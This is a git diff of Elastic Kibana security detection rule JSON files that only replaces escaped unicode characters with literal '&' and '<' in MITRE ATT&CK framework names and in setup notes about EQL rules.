a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json index 547cb75516e..2fca30e6ef4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json index f9e0b1d80ec..e1e06cd673c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json index 4c5bf01428b..e736964fd61 100644 --- a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json +++ b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json index 8b89dc51c14..11f87cd7d97 100644 --- a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_104.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json index db137b231a6..aa198832d91 100644 --- a/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d62b64a8-a7c9-43e5-aee3-15a725a794e7_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json index d2af8e9da4d..cfcb8725b10 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_3.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json index f09b801ba0d..d43ee18124b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_4.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json index 3be6e13b8b8..4b0bf7a8569 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_5.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json index c78f0dccd52..19a1b7b750f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_6.json @@ -54,7 +54,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json index 252591f9f69..26a77b387fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_7.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json index a65c4181583..e9b09d3aca5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_8.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json index 3f637a20336..81c0ed9b57f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_101.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json index 0def32d3735..601c5c50184 100644 --- a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json index b76c492354e..1cc32aa54ae 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_104.json @@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json index 732f7a2a28c..6e73361df73 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_105.json @@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json index 637c62b91ef..1f9308c8b14 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_106.json @@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json index f0a1f9bc06a..d811421ce36 100644 --- a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_107.json @@ -66,7 +66,7 @@ ], "risk_score": 73, "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json index a028268a055..689fd53b785 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_104.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json index 71e4c99670a..53ae01226bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_105.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json index 215a4b8794a..4681ca76bf4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_106.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json index 4704e1e19cf..0ac669b419c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_107.json @@ -57,7 +57,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json index 1ccf1443df8..4dafd68432a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json +++ b/packages/security_detection_engine/kibana/security_rule/d72e33fc-6e91-42ff-ac8b-e573268c5a87_108.json @@ -56,7 +56,7 @@ ], "risk_score": 47, "rule_id": "d72e33fc-6e91-42ff-ac8b-e573268c5a87", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -96,7 +96,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json index 1263398d7e1..2f0832e6115 100644 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_101.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json index 01e372c35eb..e1f9bc93f97 100644 --- a/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d743ff2a-203e-4a46-a3e3-40512cfe8fbb_102.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json index c782d6729f1..95cce9adcc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_102.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json b/packages/security_detection_engine/kibana/security_rule/d75991f2-b989-419d-b797-ac1e54ec2d61_103.json index 5fb62d01722..98696664aef 100644 --- 